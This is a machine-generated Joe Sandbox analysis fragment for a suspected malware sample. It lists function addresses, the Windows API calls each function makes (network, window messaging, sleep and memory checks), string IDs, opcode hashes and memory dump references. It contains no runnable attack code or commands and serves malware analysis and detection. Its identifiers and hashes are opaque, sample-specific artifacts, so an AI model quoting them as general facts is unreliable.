                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00774ED4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Connection_wcslen
                          • String ID: *$LPT
                          • API String ID: 1725874428-3443410124
                          • Opcode ID: 2eeeed01074b75abe6431b915a156155cf1122498056f0ab77144637fa3ae798
                          • Instruction ID: b0f2c859766c723bc7f89178c1f748a75014b4b0916faa8eb4456d96c1671e09
                          • Opcode Fuzzy Hash: 2eeeed01074b75abe6431b915a156155cf1122498056f0ab77144637fa3ae798
                          • Instruction Fuzzy Hash: F5914F75A00204DFCB14DF58C484EAABBF1AF45354F19C099E40A9F3A2D779ED85CB91
                          Function 0072E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 0072E30D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 1a88bc8b0de8f602c59c1ab3208ff26d0d59eea106f6273432b6158dcc4b6f52
                          • Instruction ID: db63a0f3cf686d6314ca15daac884ad3203ae0741cf32d1649ccc31f64b4c37b
                          • Opcode Fuzzy Hash: 1a88bc8b0de8f602c59c1ab3208ff26d0d59eea106f6273432b6158dcc4b6f52
                          • Instruction Fuzzy Hash: 345180E1A1C102D6EB39B718ED453793BA4EF40741F308958F4D6462EBEB3D8C81DA46
                          Function 00787771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,?,00000000,00000000), ref: 007878DD
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,00000000,?,00000000,00000000), ref: 0078783B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BuffCharUpper$_wcslen
                          • String ID: <s|
                          • API String ID: 3544283678-2408698564
                          • Opcode ID: 2ee6f293f38dcf81590dadeeab0fc4d311f5f7be6aab73a69f34197a1e2d8b27
                          • Instruction ID: 20ce6976da44fd6cf6fdc0c53e068bd3e541a84215595a174a5775d2d2755b25
                          • Opcode Fuzzy Hash: 2ee6f293f38dcf81590dadeeab0fc4d311f5f7be6aab73a69f34197a1e2d8b27
                          • Instruction Fuzzy Hash: F4612E72954219EACF09FBA4CC95DFDB3B8BF14700B544229E543A71D1EF38AA45CBA0
                          Function 0071E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: 4b5e6a74a161badc77b773ddf4be090ba19e3695976b605a847bcb2ffb19eb05
                          • Instruction ID: fac7f0df898cfa2557e85548c5af8b3b4e6378943e154320294702d44b156651
                          • Opcode Fuzzy Hash: 4b5e6a74a161badc77b773ddf4be090ba19e3695976b605a847bcb2ffb19eb05
                          • Instruction Fuzzy Hash: 13515271900256DFDB19DF28C091AFA7BA8FF19310F248415FC919B2C0DA7C9E86CBA0
                          Function 0071F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 0071F2A2
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0071F2BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 8efcffff956792ab538e8cf6f83ec60e7a66333e3024ee517f72ffe924012c28
                          • Instruction ID: 759c0322980b015ac703704a3c7b4c033dc6a8b7d2531de174c92989b4a9e0a8
                          • Opcode Fuzzy Hash: 8efcffff956792ab538e8cf6f83ec60e7a66333e3024ee517f72ffe924012c28
                          • Instruction Fuzzy Hash: D7512772408745DBD320AF10D88ABABBBF8FB84300F818A5DF19941195EB749529CB67
                          Function 00785745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007857E0
                          • _wcslen.LIBCMT ref: 007857EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcslen
                          • String ID: CALLARGARRAY
                          • API String ID: 157775604-1150593374
                          • Opcode ID: f328cdb2da8ca3002011b94a8e9e254a70f2a5f5a374dec8b21ac6e2893cacb3
                          • Instruction ID: 36e6eb978c583e43ff77ef27962fed673ecde4b57c7153c2534e242ca427ef7e
                          • Opcode Fuzzy Hash: f328cdb2da8ca3002011b94a8e9e254a70f2a5f5a374dec8b21ac6e2893cacb3
                          • Instruction Fuzzy Hash: 6F419D31A40209DFCB04EFA8C8859AEBBF5EF59320F10416AE505A7291E7789D81CBA0
                          Function 0077D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0077D130
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0077D13A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CrackInternet_wcslen
                          • String ID: |
                          • API String ID: 596671847-2343686810
                          • Opcode ID: ff78a221e23296f176793b0e83cae3cbd089d68207285272c1bea4911d0a2908
                          • Instruction ID: d2f60cb8892369ea6f2e2c82adc380ccf0ffa7cd0ce7522a82b643200eef464b
                          • Opcode Fuzzy Hash: ff78a221e23296f176793b0e83cae3cbd089d68207285272c1bea4911d0a2908
                          • Instruction Fuzzy Hash: 0E313071D00219EBCF15EFA4CC89AEE7FB9FF04340F404119F919A61A2E739A956CB60
                          Function 0079356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00793621
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0079365C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 1aad74f5625e60d71e400aaf49cf2928d0045e005677c31097a4f548cfe28572
                          • Instruction ID: 0642f1f5fc60686db2bec77392173ae7fa2a45e33e465991569afa6bcb05aecb
                          • Opcode Fuzzy Hash: 1aad74f5625e60d71e400aaf49cf2928d0045e005677c31097a4f548cfe28572
                          • Instruction Fuzzy Hash: 62318D71100604AADF10DF78EC81EFB73A9FF88724F009619F8A5D7280DA39AD91D760
                          Function 00794537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0079461F
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00794634
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: cc4a884f4712e469e016a9bf1fde3e0405a66653af4c8cfaa038d48100bfe805
                          • Instruction ID: 730b1abec8fb2a42f3b1ff864b80f080653ff5153a4e5e806c07e92786adf670
                          • Opcode Fuzzy Hash: cc4a884f4712e469e016a9bf1fde3e0405a66653af4c8cfaa038d48100bfe805
                          • Instruction Fuzzy Hash: 9E3148B5A01209AFDF14CFA9D990FDA7BB5FF09300F11416AE904AB341D734A952CF90
                          Function 007931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0079327C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00793287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 23ccd10cdb54e13695d22fb25cb45528b319eaf6de557e865a763c729c9b3c5c
                          • Instruction ID: 03fe1b01f8bddba311d5faa4f1125ddd2132d8abefe2b5fc22d4db77979ffffc
                          • Opcode Fuzzy Hash: 23ccd10cdb54e13695d22fb25cb45528b319eaf6de557e865a763c729c9b3c5c
                          • Instruction Fuzzy Hash: 4011B271300208BFFF25DF94EC84EBB3BAAFB94364F104129F91897290D6399D518760
                          Function 00793710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                            • Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
                            • Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          • GetWindowRect.USER32(00000000,?), ref: 0079377A
                          • GetSysColor.USER32(00000012), ref: 00793794
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: 6125cd42fd3ab620c38f418337c6a0ed3a9793ba271912624e3ef7e8806ffefe
                          • Instruction ID: 371b55861e451eb338e52746da79d4a7bfcc62773b54aac2a7e7d2a25feb05b8
                          • Opcode Fuzzy Hash: 6125cd42fd3ab620c38f418337c6a0ed3a9793ba271912624e3ef7e8806ffefe
                          • Instruction Fuzzy Hash: 781137B2610209AFDF01DFB8DC86EEA7BF8FB08314F004915F955E2250E739E8619B60
                          Function 0077CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0077CD7D
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0077CDA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: 17c0059f5b95f66c509a50886c96c90de4e5e2e53e345a4e36cb2a131cb69533
                          • Instruction ID: 28e6d202965c43414be2bacd24c2efb4b0a31d5e685f33e02c64b0d9eb2cff6c
                          • Opcode Fuzzy Hash: 17c0059f5b95f66c509a50886c96c90de4e5e2e53e345a4e36cb2a131cb69533
                          • Instruction Fuzzy Hash: AD11A371305631BADB364A668C45EE7BEA8EB1A7E4F00822EB10D82180D6689841D6F0
                          Function 00793429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 007934AB
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007934BA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: c49744a53165de2335519da119a3abf3b49ee194340727e0c119389b976690c2
                          • Instruction ID: 00feced8b296c065c8930d69715bdbc9d3475105495e568fa6cc185b57f587d2
                          • Opcode Fuzzy Hash: c49744a53165de2335519da119a3abf3b49ee194340727e0c119389b976690c2
                          • Instruction Fuzzy Hash: 7E118C71100248ABEF128F64EC44ABB3BAAEB05378F518724F965931E0C779EC519B64
                          Function 00766C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • CharUpperBuffW.USER32(?,?,?), ref: 00766CB6
                          • _wcslen.LIBCMT ref: 00766CC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: STOP
                          • API String ID: 1256254125-2411985666
                          • Opcode ID: f3a03238c3142ba144cad87a02745878891848366c327a0660a741ffbb1de11b
                          • Instruction ID: 4862b81aa9de1723f5e36f510333dcb97ee23d9bba82dc5b7039fef469b0cfde
                          • Opcode Fuzzy Hash: f3a03238c3142ba144cad87a02745878891848366c327a0660a741ffbb1de11b
                          • Instruction Fuzzy Hash: C301C032A00926CACB21AFBDDC959BF77A5EF61710B900528ED63961D1EB39E940C660
                          Function 00761CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00761D4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 42168789208e2d1ae5ac2a1143175d5ab7cf767d192c69510add0af9dd20e05b
                          • Instruction ID: 4e05dba166bf3995db8243288c5173ad0df272426bfc2f55128c7f9293c6cd78
                          • Opcode Fuzzy Hash: 42168789208e2d1ae5ac2a1143175d5ab7cf767d192c69510add0af9dd20e05b
                          • Instruction Fuzzy Hash: A0019271601214EBCB04ABA4CC59DFE77A8AB56350B440A19BD23672C2EA3959088660
                          Function 00761BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00761C46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: cfdc3c991d7b3244b0a5fa169e7a588529122e42c0e3ce2214549b0a87181f81
                          • Instruction ID: 04fbae3a86b6985f4f85448041ae7aa5cc88f4ec83ef24c6e45e7b8827510a5e
                          • Opcode Fuzzy Hash: cfdc3c991d7b3244b0a5fa169e7a588529122e42c0e3ce2214549b0a87181f81
                          • Instruction Fuzzy Hash: D401A7B5A81104E6DB04EBA0C95AEFF77E89B11340F540019BD17672C2EA2D9E18D7B1
                          Function 00761C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00761CC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 5e97157cd4416baaed8886cbbbfa769511f92a159590899355fb7f8ad14a459c
                          • Instruction ID: fc17d13f72a58d30eaad32fd716080e56bd31f7d0a42bb3257daed71f7d5e32d
                          • Opcode Fuzzy Hash: 5e97157cd4416baaed8886cbbbfa769511f92a159590899355fb7f8ad14a459c
                          • Instruction Fuzzy Hash: 4C01D6B1A80158E7DB04EBA0CA09EFF77E89B11340F580419BD03732C2EA2D9F08D671
                          Function 0071A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0071A529
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer_wcslen
                          • String ID: ,%}$3yu
                          • API String ID: 2551934079-347936961
                          • Opcode ID: 94d8c35a14993a5f23fb654ff8da6b6e6243461261430ef3ef80c8b9cafafce3
                          • Instruction ID: fc97476ec1df033fbd152875bb1dba91a4a856288fdd1aefd6f9de898750e180
